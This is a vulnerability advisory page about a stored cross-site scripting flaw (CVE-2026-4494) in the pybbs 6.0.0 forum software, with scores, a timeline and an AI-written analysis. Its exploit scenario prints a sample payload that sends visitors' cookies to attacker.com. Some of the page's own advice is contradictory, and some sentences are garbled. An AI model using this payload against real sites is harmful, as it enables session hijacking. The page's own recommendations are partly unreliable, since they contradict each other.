Which versions of Java are affected by CVE-2026-4494?

CVE-2026-4494 is a low-severity vulnerability in A vulnerability involving cross-site scripting (CVSS 3.5).

Is there a public PoC exploit available for CVE-2026-4494?

Yes, a public proof-of-concept exploit is available for CVE-2026-4494. Prioritise patching immediately. EPSS: 0.0%.

How to fix or mitigate CVE-2026-4494?

During next maintenance window: Apply vendor patches when convenient. Verify cross-site scripting controls are in place.

Java CVE-2026-4494

Q: What is the CVSS score of CVE-2026-4494?

CVE-2026-4494 has a CVSS 4.0 base score of 2.0 (Low). CVSS vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X. EPSS exploitation probability: 0.0%.

EUVD-2026-13756 LOW

Cross-site Scripting (XSS) (CWE-79)

2026-03-20 VulDB

XSS Java

2.0

CVSS 4.0 · NVD

Severity by source

NVD PRIMARY

2.0 LOW

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Attack Vector

Network

Attack Complexity

Low

Privileges Required

Low

User Interaction

Scope

Lifecycle Timeline

Severity Changed

Apr 29, 2026 - 01:11 NVD

MEDIUM LOW

CVSS changed

Apr 29, 2026 - 01:11 NVD

5.1 (MEDIUM) 2.0 (LOW)

Severity Changed

Apr 22, 2026 - 21:37 NVD

LOW MEDIUM

CVSS changed

Apr 22, 2026 - 21:37 NVD

3.5 (LOW) 5.1 (MEDIUM)

PoC Detected

Mar 24, 2026 - 15:54 vuln.today

Public exploit code

EUVD ID Assigned

Mar 20, 2026 - 17:45 euvd

EUVD-2026-13756

Analysis Generated

Mar 20, 2026 - 17:45 vuln.today

CVE Published

Mar 20, 2026 - 17:32 nvd

LOW 3.5

DescriptionCVE.org

A vulnerability was identified in atjiu pybbs 6.0.0. This affects the function create of the file src/main/java/co/yiiu/pybbs/controller/api/TopicApiController.java. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit is publicly available and might be used.

AnalysisAI

A stored cross-site scripting (XSS) vulnerability exists in atjiu pybbs 6.0.0 within the TopicApiController.java create function that allows authenticated attackers to inject malicious scripts into topic creation requests. The vulnerability affects all versions of the pybbs application matching the CPE cpe:2.3:a:atjiu:pybbs:*:*:*:*:*:*:*:*, and while the CVSS score of 3.5 is low, a publicly available proof-of-concept exploit has been disclosed, indicating active research and potential real-world exploitation risk.

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment	The CVSS score of 3.5 (Low) reflects limited severity due to several mitigating factors: the attack requires authenticated access (PR:L), user interaction is required for the payload to execute (UI:R), and the integrity impact is limited (I:L with no confidentiality or availability impact). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An authenticated attacker creates a forum topic with a specially crafted title or content containing JavaScript payload, such as '<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">'. When other users view the topic listing or open the thread, the JavaScript executes in their browsers, potentially stealing session cookies or performing actions on their behalf. …
Remediation	Immediately upgrade atjiu pybbs to a patched version if available from the upstream project, or contact the atjiu project maintainers at their GitHub repository for security update information. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

During next maintenance window: Apply vendor patches when convenient. …

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-28575 CRITICAL Act Now

10.0 Jun 17

Local denial of service in Android's PackageInstaller subsystem stems from a logic error in PackageInstallerSession.tran

CVE-2026-41699 CRITICAL Act Now

9.8 Jun 11

Remote code execution in Spring for GraphQL versions 1.3.0-1.3.8, 1.4.0-1.4.5, and 2.0.0-2.0.3 allows unauthenticated at

CVE-2026-47835 HIGH This Week

8.6 Jun 15

NoSQL/query injection in Spring AI Vector Stores (1.0.0-1.0.8 and 1.1.0-1.1.7) allows remote unauthenticated attackers t

CVE-2026-47825 HIGH This Week

8.6 Jun 15

Origin validation failure in Spring Cloud Gateway (WebMVC and WebFlux Server variants) allows remote attackers to spoof

CVE-2026-40999 HIGH This Week

8.6 Jun 11

Server-Side Request Forgery in Spring Web Services (versions 3.1.0-3.1.8, 4.0.0-4.0.18, 4.1.0-4.1.3, and 5.0.0-5.0.1) al

CVE-2026-4494 vulnerability details – vuln.today

Back